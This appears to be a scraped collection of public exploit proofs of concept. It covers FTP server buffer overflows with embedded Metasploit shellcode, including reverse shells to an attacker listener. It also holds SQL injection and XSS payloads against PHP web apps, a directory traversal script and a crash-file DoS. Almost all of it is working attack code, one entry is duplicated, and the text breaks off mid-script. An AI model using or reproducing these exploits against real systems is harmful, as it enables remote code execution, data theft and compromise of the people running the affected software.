  1. # Exploit Title: Easy PhotoResQ 1.0 - Denial Of Service (PoC) # Author: Gionathan "John" Reale # Discovey Date: 2018-08-29 # Homepage: https://www.hdtune.com/ # Software Link: https://www.hdtune.com/download.html # Tested Version: v1.0 # Tested on OS: Windows 7 32-bit # Steps to Reproduce: Run the python exploit script, it will create a new # file with the name "exploit.txt". Copy the content of the new file "exploit.txt". # Now start the program. Now when you are inside of the program click "File" > "Options". In the field: "Folder / filename" paste the copied content from "exploit.txt". # Now click "OK" and see a crash! #!/usr/bin/python buffer = "A" * 6000 payload = buffer try: f=open("exploit.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"
  2. # Title: Konica Minolta FTP Utility - Remote Command Execution # Date : 20/09/2015 # Author: R-73eN # Software: Konica Minolta FTP Utility v1.0 # Tested: Windows XP SP3 # Software link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip # Every command is vulnerable to buffer overflow. import socket import struct shellcode = ""#msfvenom -p windows/exec cmd=calc.exe -f python -b "\x00\x0d\x0a\x3d\x5c\x2f" shellcode += "\xbd\xfe\xbd\x27\xc9\xda\xd8\xd9\x74\x24\xf4\x5e\x29" shellcode += "\xc9\xb1\x31\x31\x6e\x13\x83\xee\xfc\x03\x6e\xf1\x5f" shellcode += "\xd2\x35\xe5\x22\x1d\xc6\xf5\x42\x97\x23\xc4\x42\xc3" shellcode += "\x20\x76\x73\x87\x65\x7a\xf8\xc5\x9d\x09\x8c\xc1\x92" shellcode += "\xba\x3b\x34\x9c\x3b\x17\x04\xbf\xbf\x6a\x59\x1f\xfe" shellcode += "\xa4\xac\x5e\xc7\xd9\x5d\x32\x90\x96\xf0\xa3\x95\xe3" shellcode += "\xc8\x48\xe5\xe2\x48\xac\xbd\x05\x78\x63\xb6\x5f\x5a" shellcode += "\x85\x1b\xd4\xd3\x9d\x78\xd1\xaa\x16\x4a\xad\x2c\xff" shellcode += "\x83\x4e\x82\x3e\x2c\xbd\xda\x07\x8a\x5e\xa9\x71\xe9" shellcode += "\xe3\xaa\x45\x90\x3f\x3e\x5e\x32\xcb\x98\xba\xc3\x18" shellcode += "\x7e\x48\xcf\xd5\xf4\x16\xd3\xe8\xd9\x2c\xef\x61\xdc" shellcode += "\xe2\x66\x31\xfb\x26\x23\xe1\x62\x7e\x89\x44\x9a\x60" shellcode += "\x72\x38\x3e\xea\x9e\x2d\x33\xb1\xf4\xb0\xc1\xcf\xba" shellcode += "\xb3\xd9\xcf\xea\xdb\xe8\x44\x65\x9b\xf4\x8e\xc2\x53" shellcode += "\xbf\x93\x62\xfc\x66\x46\x37\x61\x99\xbc\x7b\x9c\x1a" shellcode += "\x35\x03\x5b\x02\x3c\x06\x27\x84\xac\x7a\x38\x61\xd3" shellcode += "\x29\x39\xa0\xb0\xac\xa9\x28\x19\x4b\x4a\xca\x65" banner = "" banner +=" ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner nSEH = "\xEB\x13\x90\x90" SEH = struct.pack('<L',0x1220401E) evil = "A" * 8343 + nSEH + SEH + "\x90" * 22 + 
shellcode +"D" * (950 - len(shellcode)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server = raw_input('Enter IP : ') s.connect((server, 21)) a = s.recv(1024) print ' [+] ' + a s.send('User ' + evil ) print '[+] https://www.infogen.al/ [+]'
  3. /* --------------------------------------------------------------------- Konica Minolta FTP Utility directory traversal vulnerability Url: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip Author: shinnai mail: shinnai[at]autistici[dot]org site: http://www.shinnai.altervista.org/ Poc: http://shinnai.altervista.org/exploits/SH-0024-20150922.html --------------------------------------------------------------------- */ <?php $local_file = 'boot.ini.txt'; $server_file = '..\..\..\..\..\..\..\..\boot.ini'; $conn_id = ftp_connect($ftp_server); $login_result = ftp_login($conn_id, "anonymous", "anonymous"); if (ftp_get($conn_id, $local_file, $server_file, FTP_BINARY)) { echo "Successfully written to $local_file\n"; } else { echo "There was a problem\n"; } ftp_close($conn_id); ?> ---------------------------------------------------------------------
  4. Hacking

    <!-- # # # # # # Exploit Title: Bus Booking Script 1.0 - SQL Injection # Dork: N/A # Date: 13.12.2017 # Vendor Homepage: http://www.phpautoclassifiedscript.com/ # Software Link: http://www.phpautoclassifiedscript.com/bus-booking-script.html # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2017-17645 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: --> <html> <body> <form action="http://localhost/newbusbooking/admin/index.php" method="post" enctype="application/x-www-form-urlencoded" name="frmlogin" target="_self"> <input name="txtname" type="text" value="' UNION ALL SELECT 0x31,0x564552204159415249,0x33,0x34,0x35-- Ver Ayari"></div> <input name="logbut" id="logbut" type="submit"></div> </form> </body> </html>
  5. # # # # # # Exploit Title: Joomla! Component Bargain Product VM3 1.0 - SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor Homepage: https://www.weborange.eu/ # Software Link: https://www.weborange.eu/extensions/index.php/extensions-vm3/bargain-product-vm3-detail # Demo: http://www.weborange.eu/demo/index.php/bargain-product # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=brainy&product_id=[SQL] # http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=alice&product_id=[SQL] # # 17+OR+0x3231323232+/*!00005Group*/+BY+/*!00005ConcAT_WS*/(0x3a,0x496873616e2053656e63616e,VersioN(),FLooR(RaND(0)*0x32))+/*!00005havinG*/+min(0)+OR+0x31 # # Etc.. # # # # #
  6. Hacking

    # # # # # # Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022 # Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The security obligation allows an attacker to arbitrary download files.. # # Vulnerable Source: # # ............. # <?php # $file = base64_decode($_GET['id']); # # if (file_exists($file)) { # header('Content-Description: File Transfer'); # header('Content-Type: application/octet-stream'); # header('Content-Disposition: attachment; filename="'.basename($file).'"'); # header('Expires: 0'); # header('Cache-Control: must-revalidate'); # header('Pragma: public'); # header('Content-Length: ' . filesize($file)); # readfile($file); # exit; # } # ?> # ............. # Proof of Concept: # # http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64] # # Etc... # # # # #
  7. Hacking

    # # # # # # Exploit Title: FineCMS 1.0 Multiple Vulnerabilities # Dork: N/A # Date: 29.08.2017 # Vendor Homepage : http://mvc.net.pl/ # Software Link: https://github.com/andrzuk/FineCMS # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: sohaip-hackerDZ # Author Web: http://www.hacker-ar.com # Author Social: @sohaip_hackerDZ # # # # # Reflected XSS in get_image.php Technical Description: file /application/lib/ajax/get_image.php the $_POST['id'] and $_POST['name'] and $_GET['folder'] without any validated, sanitised or output encoded. Proof of Concept(PoC) http://your_finecms/application/lib/ajax/get_image.php?folder=1 POST: id=1"><script>alert(1)</script>&name=1 Arbitrary File Modify Technical Description: The base function for modify the template can modify the filename,this leads to the Arbitrary File Modify, who could allow attacker getshell. file /appalication/core/controller/template.php line50-line53 follow function save() file /appalication/core/model/template.php line26-line48 if file exists, we can modify it whihout any limit. insterestingly, there are two more Vulnerability for same function in different files. file /appalication/core/model/style.php line26-line48 file /appalication/core/model/script.php line26-line48 Proof of Concept(PoC) http://your_finecms/index.php?route=template http://your_finecms/index.php?route=style http://your_finecms/index.php?route=script POST: contents=<?php phpinfo();?>&filename={any exist filename}&savabutton=Zapisz Authenticated SQL injection all FineCMS use PDO to connect the mysql server, so all the data without any validated, sanitised or output encoded injection database.but in application/core/controller/excludes.php, the website author use mysqli to connect mysql server.the lead SQL injection, who could allow attacker use some payload to get data in database. 
Technical Description: file application/core/controller/excludes.php line75, the visitor_ip insert into database without any validated, sanitised or output encoded. file /stat/get_stat_data.php line30 the sql inject into sql_query and execute. Proof of Concept(PoC) http://your_finecms/index.php?route=excludes&action=add POST: visitor_ip=1%27%2Csleep%281%29%2C%271&save_button=Zapisz and view http://your_finecms/stat/get_stat_data.php,we can feel website loading sleep. Stored XSS in images.php FineCMS allow admin to upload image into gallery, and it will show image data into pages, but some data will output into pages without any validated, sanitised or output encoded. they allow attacker Cross Site Scripting. Technical Description: when we upload the file file application/core/controller/images.php line87 and follow the function add() file application/core/model/images.php line78 if filetype startwith "image",the filetype will insert into database when we view the detail of the images file application/lib/generators/view.php line106, somethings will output into pages. Proof of Concept(PoC) view the http://your_finecms/index.php?route=images&action=add and upload picture modify the picture's filetype view the detail of picture Because of the vulnerability also in edit detail page. so you also can use edit to insert Script code in pages. http://your_finecms/index.php?route=images&action=edit&id=15 view the detail of picture Stored XSS in visitors.php FineCMS stores all the visitors the visit url, but in detail of log they output into pages without any validated, sanitised or output encoded. they allow attacker Cross Site Scripting. Technical Description: just like last vulnerability. Proof of Concept(PoC) visit any page with js script code. such as index.php?route=images&action=view&id=14'"><script>alert(1)</script>
  8. Hacking

    # # # # # # Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022 # Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The security obligation allows an attacker to arbitrary download files.. # # Vulnerable Source: # # ............. # <?php # $file = base64_decode($_GET['id']); # # if (file_exists($file)) { # header('Content-Description: File Transfer'); # header('Content-Type: application/octet-stream'); # header('Content-Disposition: attachment; filename="'.basename($file).'"'); # header('Expires: 0'); # header('Cache-Control: must-revalidate'); # header('Pragma: public'); # header('Content-Length: ' . filesize($file)); # readfile($file); # exit; # } # ?> # ............. # Proof of Concept: # # http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64] # # Etc... # # # # #
  9. Hacking

    # # # # # # Exploit Title: iGreeting Cards 1.0 - SQL Injection # Dork: N/A # Date: 04.09.2017 # Vendor Homepage: http://coryapp.com/ # Software Link: http://coryapp.com/?product&index # Demo: http://coryapp.com/demo/greetingcards/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/index.php?index&search&k=[SQL] # # eFe'+/*!11112UnIoN*/(/*!11112SelEcT*/+0x283129,VERSioN(),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829)--+- # # http://localhost/[PATH]/index.php?index&index&p=[SQL] # # http://localhost/[PATH]/index.php?category&index&id=[SQL] # # Etc.. # # # # #
  10. Hacking

    # # # # # # Exploit Title: The Car Project 1.0 - SQL Injection # Dork: N/A # Date: 05.09.2017 # Vendor Homepage: http://thecarproject.org/ # Software Link: http://thecarproject.org/thecarproject.zip # Demo: http://www.thecarproject.org/cp # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Vulnerable Source: # # <?php # ............. # if(isset($_GET['car_id'])) { # $motor_id = $_GET['car_id']; # if (!empty($_GET['man_id'])){ # $manufacturer_id = $_GET['man_id']; # } # ............. # ?> # # Proof of Concept: # # http://localhost/[PATH]/info.php?car_id=[SQL] # # -5+/*!11122uNiOn*/(/*!11122sELect*/0x283129,0x283229,/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()),0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,(44),0x28343529,0x28343629,0x28343729,0x28343829,0x28343929) # # Etc.. # # # # #
  11. Hacking

    #!/usr/bin/env python # -*- coding: utf-8 -*- # Exploit Title: FreeFloat FTP Server RENAME Command Buffer Overflow Exploit # Date: 29/10/2016 # Exploit Author: Eagleblack # Software Link: http://www.freefloat.com/software/freefloatftpserver.zip # Version: 1.00 # Tested on: Windows XP Profesional SP3 Spanish version x86 # CVE : N/A #Description: FreeFloat FTP server allow login as root without a user and password, this vulnerability allow to an attacker login and send a # long chain of characters that overflow the buffer, when the attacker knows the exact number that overwritten the EIP registry # he can take possession of the application and send a malicious code (payload) to the ESP stack pointer that allow obtain # a remote code execution on the system that is running the FTP Server, in this case Windows XP. import socket ret = "\x5B\x96\xDC\x77" #ADVAPI32.dll this dll have a jump to ESP stack pointer #Metasploit shellcode: #msfvenom -p windows/shell_reverse_tcp LHOST='IP address Local host' LPORT='' -b '\x00\x0a\x0d' -f c shellcode = ("\xd9\xe5\xba\x7e\xd1\x2c\x95\xd9\x74\x24\xf4\x58\x33\xc9\xb1" "\x52\x31\x50\x17\x83\xe8\xfc\x03\x2e\xc2\xce\x60\x32\x0c\x8c" "\x8b\xca\xcd\xf1\x02\x2f\xfc\x31\x70\x24\xaf\x81\xf2\x68\x5c" "\x69\x56\x98\xd7\x1f\x7f\xaf\x50\x95\x59\x9e\x61\x86\x9a\x81" "\xe1\xd5\xce\x61\xdb\x15\x03\x60\x1c\x4b\xee\x30\xf5\x07\x5d" "\xa4\x72\x5d\x5e\x4f\xc8\x73\xe6\xac\x99\x72\xc7\x63\x91\x2c" "\xc7\x82\x76\x45\x4e\x9c\x9b\x60\x18\x17\x6f\x1e\x9b\xf1\xa1" "\xdf\x30\x3c\x0e\x12\x48\x79\xa9\xcd\x3f\x73\xc9\x70\x38\x40" "\xb3\xae\xcd\x52\x13\x24\x75\xbe\xa5\xe9\xe0\x35\xa9\x46\x66" "\x11\xae\x59\xab\x2a\xca\xd2\x4a\xfc\x5a\xa0\x68\xd8\x07\x72" "\x10\x79\xe2\xd5\x2d\x99\x4d\x89\x8b\xd2\x60\xde\xa1\xb9\xec" "\x13\x88\x41\xed\x3b\x9b\x32\xdf\xe4\x37\xdc\x53\x6c\x9e\x1b" "\x93\x47\x66\xb3\x6a\x68\x97\x9a\xa8\x3c\xc7\xb4\x19\x3d\x8c" "\x44\xa5\xe8\x03\x14\x09\x43\xe4\xc4\xe9\x33\x8c\x0e\xe6\x6c" 
"\xac\x31\x2c\x05\x47\xc8\xa7\xea\x30\xd3\x30\x83\x42\xd3\x3f" "\xe8\xca\x35\x55\x1e\x9b\xee\xc2\x87\x86\x64\x72\x47\x1d\x01" "\xb4\xc3\x92\xf6\x7b\x24\xde\xe4\xec\xc4\x95\x56\xba\xdb\x03" "\xfe\x20\x49\xc8\xfe\x2f\x72\x47\xa9\x78\x44\x9e\x3f\x95\xff" "\x08\x5d\x64\x99\x73\xe5\xb3\x5a\x7d\xe4\x36\xe6\x59\xf6\x8e" "\xe7\xe5\xa2\x5e\xbe\xb3\x1c\x19\x68\x72\xf6\xf3\xc7\xdc\x9e" "\x82\x2b\xdf\xd8\x8a\x61\xa9\x04\x3a\xdc\xec\x3b\xf3\x88\xf8" "\x44\xe9\x28\x06\x9f\xa9\x59\x4d\xbd\x98\xf1\x08\x54\x99\x9f" "\xaa\x83\xde\x99\x28\x21\x9f\x5d\x30\x40\x9a\x1a\xf6\xb9\xd6" "\x33\x93\xbd\x45\x33\xb6") buffer = '\x41'* 245 + ret + '\x90'* 30 + shellcode #EIP overwritten at offset 245 print "Sending Buffer" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #open socket connect = s.connect(('192.168.1.13',21)) #IP address and port (21) from the target s.recv(1024) #FTPBanner s.send('USER \r\n') #Sending USER (Null user) s.recv(1024) s.send('PASS \r\n') #Sending Password (Null password) s.recv(1024) s.send('RENAME' + buffer +'\r\n') s.close()
  12. Hacking

    #!/usr/bin/env python #-*- coding: utf-8 -*- # Exploit Title: FreeFloat FTP Server HOST Command Buffer Overflow Exploit # Date: 30/10/2016 # Exploit Author: Cybernetic # Software Link: http://www.freefloat.com/software/freefloatftpserver.zip # Version: 1.00 # Tested on: Windows XP Profesional SP3 ESP x86 # CVE : N/A import socket, os, sys ret="\xC7\x31\x6B\x7E" #Shell32.dll 7E6B31C7 #Metasploit Shellcode #msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -b '\x00\x0a\x0d' -f c #nc -lvp 443 #Send exploit shellcode=("\xbb\x89\x62\x48\xda\xdb\xda\xd9\x74\x24\xf4\x5a\x33\xc9\xb1" "\x52\x31\x5a\x12\x03\x5a\x12\x83\x4b\x66\xaa\x2f\xb7\x8f\xa8" "\xd0\x47\x50\xcd\x59\xa2\x61\xcd\x3e\xa7\xd2\xfd\x35\xe5\xde" "\x76\x1b\x1d\x54\xfa\xb4\x12\xdd\xb1\xe2\x1d\xde\xea\xd7\x3c" "\x5c\xf1\x0b\x9e\x5d\x3a\x5e\xdf\x9a\x27\x93\x8d\x73\x23\x06" "\x21\xf7\x79\x9b\xca\x4b\x6f\x9b\x2f\x1b\x8e\x8a\xfe\x17\xc9" "\x0c\x01\xfb\x61\x05\x19\x18\x4f\xdf\x92\xea\x3b\xde\x72\x23" "\xc3\x4d\xbb\x8b\x36\x8f\xfc\x2c\xa9\xfa\xf4\x4e\x54\xfd\xc3" "\x2d\x82\x88\xd7\x96\x41\x2a\x33\x26\x85\xad\xb0\x24\x62\xb9" "\x9e\x28\x75\x6e\x95\x55\xfe\x91\x79\xdc\x44\xb6\x5d\x84\x1f" "\xd7\xc4\x60\xf1\xe8\x16\xcb\xae\x4c\x5d\xe6\xbb\xfc\x3c\x6f" "\x0f\xcd\xbe\x6f\x07\x46\xcd\x5d\x88\xfc\x59\xee\x41\xdb\x9e" "\x11\x78\x9b\x30\xec\x83\xdc\x19\x2b\xd7\x8c\x31\x9a\x58\x47" "\xc1\x23\x8d\xc8\x91\x8b\x7e\xa9\x41\x6c\x2f\x41\x8b\x63\x10" "\x71\xb4\xa9\x39\x18\x4f\x3a\x86\x75\x4e\xde\x6e\x84\x50\x1f" "\xd4\x01\xb6\x75\x3a\x44\x61\xe2\xa3\xcd\xf9\x93\x2c\xd8\x84" "\x94\xa7\xef\x79\x5a\x40\x85\x69\x0b\xa0\xd0\xd3\x9a\xbf\xce" "\x7b\x40\x2d\x95\x7b\x0f\x4e\x02\x2c\x58\xa0\x5b\xb8\x74\x9b" "\xf5\xde\x84\x7d\x3d\x5a\x53\xbe\xc0\x63\x16\xfa\xe6\x73\xee" "\x03\xa3\x27\xbe\x55\x7d\x91\x78\x0c\xcf\x4b\xd3\xe3\x99\x1b" "\xa2\xcf\x19\x5d\xab\x05\xec\x81\x1a\xf0\xa9\xbe\x93\x94\x3d" "\xc7\xc9\x04\xc1\x12\x4a\x34\x88\x3e\xfb\xdd\x55\xab\xb9\x83" "\x65\x06\xfd\xbd\xe5\xa2\x7e\x3a\xf5\xc7\x7b\x06\xb1\x34\xf6" 
"\x17\x54\x3a\xa5\x18\x7d") shell= '\x90'*30 + shellcode buffer='\x41'*247 + ret + shell + '\x43'*(696-len(shell)) print "Sending Buffer" s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('10.10.10.10',21)) s.recv(1024) s.send('USER test \r\n') s.recv(1024) s.send('PASS test \r\n') s.recv(1024) s.send('HOST' +buffer+ '\r\n') s.close() print "Attack Buffer Overflow Successfully Executed"
  13. Hacking

    #!/usr/bin/env python # -*- coding: utf-8 -*- import socket #Exploit Title: FreeFloat FTP Server Buffer Overflow RMD command #Date: 29 Octubre 2016 #Exploit Author: Karri93 #Software Link: http://www.freefloat.com/software/freefloatftpserver.zip #Version: 1.0 #Tested on: Windows XP Profesional SP3 Spanish x86 #Shellcode Metasploit: #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.7 LPORT=443 -b '\x00\x0A\x0D' -f -c #nc -lvp 443 ret= "\x2F\x1D\xF1\x77" #GDI32.dll shellcode=("\xd9\xc4\xd9\x74\x24\xf4\x5b\x33\xc9\xb1\x52\xba\x9b\x84\x71" "\xb0\x83\xc3\x04\x31\x53\x13\x03\xc8\x97\x93\x45\x12\x7f\xd1" "\xa6\xea\x80\xb6\x2f\x0f\xb1\xf6\x54\x44\xe2\xc6\x1f\x08\x0f" "\xac\x72\xb8\x84\xc0\x5a\xcf\x2d\x6e\xbd\xfe\xae\xc3\xfd\x61" "\x2d\x1e\xd2\x41\x0c\xd1\x27\x80\x49\x0c\xc5\xd0\x02\x5a\x78" "\xc4\x27\x16\x41\x6f\x7b\xb6\xc1\x8c\xcc\xb9\xe0\x03\x46\xe0" "\x22\xa2\x8b\x98\x6a\xbc\xc8\xa5\x25\x37\x3a\x51\xb4\x91\x72" "\x9a\x1b\xdc\xba\x69\x65\x19\x7c\x92\x10\x53\x7e\x2f\x23\xa0" "\xfc\xeb\xa6\x32\xa6\x78\x10\x9e\x56\xac\xc7\x55\x54\x19\x83" "\x31\x79\x9c\x40\x4a\x85\x15\x67\x9c\x0f\x6d\x4c\x38\x4b\x35" "\xed\x19\x31\x98\x12\x79\x9a\x45\xb7\xf2\x37\x91\xca\x59\x50" "\x56\xe7\x61\xa0\xf0\x70\x12\x92\x5f\x2b\xbc\x9e\x28\xf5\x3b" "\xe0\x02\x41\xd3\x1f\xad\xb2\xfa\xdb\xf9\xe2\x94\xca\x81\x68" "\x64\xf2\x57\x3e\x34\x5c\x08\xff\xe4\x1c\xf8\x97\xee\x92\x27" "\x87\x11\x79\x40\x22\xe8\xea\xaf\x1b\xf3\xed\x47\x5e\xf3\xf0" "\x2c\xd7\x15\x98\x42\xbe\x8e\x35\xfa\x9b\x44\xa7\x03\x36\x21" "\xe7\x88\xb5\xd6\xa6\x78\xb3\xc4\x5f\x89\x8e\xb6\xf6\x96\x24" "\xde\x95\x05\xa3\x1e\xd3\x35\x7c\x49\xb4\x88\x75\x1f\x28\xb2" "\x2f\x3d\xb1\x22\x17\x85\x6e\x97\x96\x04\xe2\xa3\xbc\x16\x3a" "\x2b\xf9\x42\x92\x7a\x57\x3c\x54\xd5\x19\x96\x0e\x8a\xf3\x7e" "\xd6\xe0\xc3\xf8\xd7\x2c\xb2\xe4\x66\x99\x83\x1b\x46\x4d\x04" "\x64\xba\xed\xeb\xbf\x7e\x1d\xa6\x9d\xd7\xb6\x6f\x74\x6a\xdb" "\x8f\xa3\xa9\xe2\x13\x41\x52\x11\x0b\x20\x57\x5d\x8b\xd9\x25" "\xce\x7e\xdd\x9a\xef\xaa") buffer= '\x90'*30 + shellcode 
buffer1= '\x41' * 248 + ret + buffer + '\x43'*(696-len(buffer)) print "Sending..." s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('192.168.1.150',21)) s.recv(1024) s.send('USER free\r\n') s.recv(1024) s.send('PASS free\r\n') s.recv(1024) s.send('RMD' + buffer1 + '\r\n') s.close()
  14. Hacking

    #!/usr/bin/env python #-*- coding: utf-8 -*- # Exploit Title: FreeFloat FTP Server BoF ABOR Command # Date: 29/10/2016 # Exploit Author: Ger # Software Link: http://www.freefloat.com/software/freefloatftpserver.zip # Version: 1.0 # Tested on: Windows XP Profesional V. 2002 Service Pack 3 # CVE : n/a import socket #shellcode with metasploit #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.74.132 LPORT=443 -b '\x00\x0d\x0a' -f c #nc -lvp 443 #send the exploit ret='\x73\x18\x6E\x74' #MSCTF.dll shellcode=("\xdd\xc6\xd9\x74\x24\xf4\x5d\xb8\x2a\xb4\x5a\x74\x29\xc9\xb1" "\x52\x31\x45\x17\x03\x45\x17\x83\xef\xb0\xb8\x81\x13\x50\xbe" "\x6a\xeb\xa1\xdf\xe3\x0e\x90\xdf\x90\x5b\x83\xef\xd3\x09\x28" "\x9b\xb6\xb9\xbb\xe9\x1e\xce\x0c\x47\x79\xe1\x8d\xf4\xb9\x60" "\x0e\x07\xee\x42\x2f\xc8\xe3\x83\x68\x35\x09\xd1\x21\x31\xbc" "\xc5\x46\x0f\x7d\x6e\x14\x81\x05\x93\xed\xa0\x24\x02\x65\xfb" "\xe6\xa5\xaa\x77\xaf\xbd\xaf\xb2\x79\x36\x1b\x48\x78\x9e\x55" "\xb1\xd7\xdf\x59\x40\x29\x18\x5d\xbb\x5c\x50\x9d\x46\x67\xa7" "\xdf\x9c\xe2\x33\x47\x56\x54\x9f\x79\xbb\x03\x54\x75\x70\x47" "\x32\x9a\x87\x84\x49\xa6\x0c\x2b\x9d\x2e\x56\x08\x39\x6a\x0c" "\x31\x18\xd6\xe3\x4e\x7a\xb9\x5c\xeb\xf1\x54\x88\x86\x58\x31" "\x7d\xab\x62\xc1\xe9\xbc\x11\xf3\xb6\x16\xbd\xbf\x3f\xb1\x3a" "\xbf\x15\x05\xd4\x3e\x96\x76\xfd\x84\xc2\x26\x95\x2d\x6b\xad" "\x65\xd1\xbe\x62\x35\x7d\x11\xc3\xe5\x3d\xc1\xab\xef\xb1\x3e" "\xcb\x10\x18\x57\x66\xeb\xcb\x98\xdf\xb9\x8f\x71\x22\x3d\x91" "\x3a\xab\xdb\xfb\x2c\xfa\x74\x94\xd5\xa7\x0e\x05\x19\x72\x6b" "\x05\x91\x71\x8c\xc8\x52\xff\x9e\xbd\x92\x4a\xfc\x68\xac\x60" "\x68\xf6\x3f\xef\x68\x71\x5c\xb8\x3f\xd6\x92\xb1\xd5\xca\x8d" "\x6b\xcb\x16\x4b\x53\x4f\xcd\xa8\x5a\x4e\x80\x95\x78\x40\x5c" "\x15\xc5\x34\x30\x40\x93\xe2\xf6\x3a\x55\x5c\xa1\x91\x3f\x08" "\x34\xda\xff\x4e\x39\x37\x76\xae\x88\xee\xcf\xd1\x25\x67\xd8" "\xaa\x5b\x17\x27\x61\xd8\x27\x62\x2b\x49\xa0\x2b\xbe\xcb\xad" "\xcb\x15\x0f\xc8\x4f\x9f\xf0\x2f\x4f\xea\xf5\x74\xd7\x07\x84" "\xe5\xb2\x27\x3b\x05\x97") 
buffer='\x90'*20 + shellcode buffer1='\x41'*247 + ret + buffer + '\x43'*(696-len(buffer)) print "Sending Buffer" s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('192.168.74.133', 21)) s.recv(1024) s.send('USER anonymous\r\n') s.recv(1024) s.send('PASS anonymous\r\n') s.recv(1024) s.send('ABOR' + buffer1 + '\r\n') s.close()
  15. Hacking

    import socket import sys import os print ''' ############################################## # Created: ScrR1pTK1dd13 # # Name: Greg Priest # # Mail: ScrR1pTK1dd13.slammer@gmail.com # ############################################## # Exploit Title: FreefloatFTPserver1.0_dir_command_remotecode_exploit # Date: 2016.11.02 # Exploit Author: Greg Priest # Version: FreefloatFTPserver1.0 # Tested on: Windows7 x64 HUN/ENG Professional ''' ip = raw_input("Target ip: ") port = 21 overflow = 'A' * 247 eip = '\xF4\xAF\xEA\x75' + '\x90' * 10 #shellcode calc.exe shellcode =( "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" + "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" + "\x77\x20\x8b\x3f\x80\x7e\x0c\x33" + "\x75\xf2\x89\xc7\x03\x78\x3c\x8b" + "\x57\x78\x01\xc2\x8b\x7a\x20\x01" + "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" + "\x45\x81\x3e\x43\x72\x65\x61\x75" + "\xf2\x81\x7e\x08\x6f\x63\x65\x73" + "\x75\xe9\x8b\x7a\x24\x01\xc7\x66" + "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" + "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" + "\xb1\xff\x53\xe2\xfd\x68\x63\x61" + "\x6c\x63\x89\xe2\x52\x52\x53\x53" + "\x53\x53\x53\x53\x52\x53\xff\xd7") remotecode = overflow + eip + shellcode + '\r\n' s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect((ip ,port)) s.recv(1024) s.send('USER anonymous\r\n') s.recv(1024) s.send('PASSW 